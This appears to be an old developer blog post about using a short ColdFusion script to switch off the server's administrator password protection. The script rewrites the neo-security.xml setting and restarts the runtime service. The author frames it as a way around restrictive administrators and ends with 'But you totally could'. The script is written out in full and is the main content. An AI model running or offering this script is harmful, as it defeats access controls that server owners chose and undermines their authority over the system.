Hacking ColdFusion - Disable Administrator Security
During MAX 2006 I attended the ColdFusion CFC Birds of a Feather. Someone was complaining about the fact that their administrators were too restrictive despite not understanding the ColdFusion service. They were unable to see CFC introspection because of an administrator password. So I suggested they disable security programmatically.
After thinking about it for awhile, I decided that it was an interesting challenge. I looked at it a couple different ways, and finally settled on this solution:
<!--- Grab the security file contents --->
<cffile action="read" file="#server.ColdFusion.rootdir#\lib\neo-security.xml" variable="rawfilecontents" />
<!--- Convert it to a structure --->
<cfwddx action="wddx2cfml" input="#rawfilecontents#" output="loginfo" />
<!--- Change the setting --->
<cfset loginfo["admin.security.enabled"] = JavaCast("boolean", false) />
<!--- Convert back to WDDX --->
<cfwddx action="cfml2wddx" input="#loginfo#" output="fileToWrite" />
<!--- Write it back to the disk. --->
<cffile action="write" addnewline="yes" file="#server.ColdFusion.rootdir#\lib\neo-security.xml" output="#fileToWrite#" fixnewline="no" />
<!--- This seems to restart the server eventually. I had to rerun it several times to get it to work. --->
<cfset serverFactory = CreateObject("java", "coldfusion.server.ServiceFactory") />
<cfset runTimeService = serverFactory.RuntimeService />
<cfset runTimeService.ReStart() />
You have to run it a couple times before it kicks in.
Now, it is important to point out the following:
- If proper sandboxing is enabled, this won't work.
- If proper IIS restrictions on CFIDE\administrator are set, this won't work.
- You should never do this on a hosted server as it will probably violate your hosting agreement.
- I'm not advocating messing with your administrators.
- But you totally could.
0 responses so far ↓
There are no comments yet...Kick things off by filling out the form below.
Leave a Comment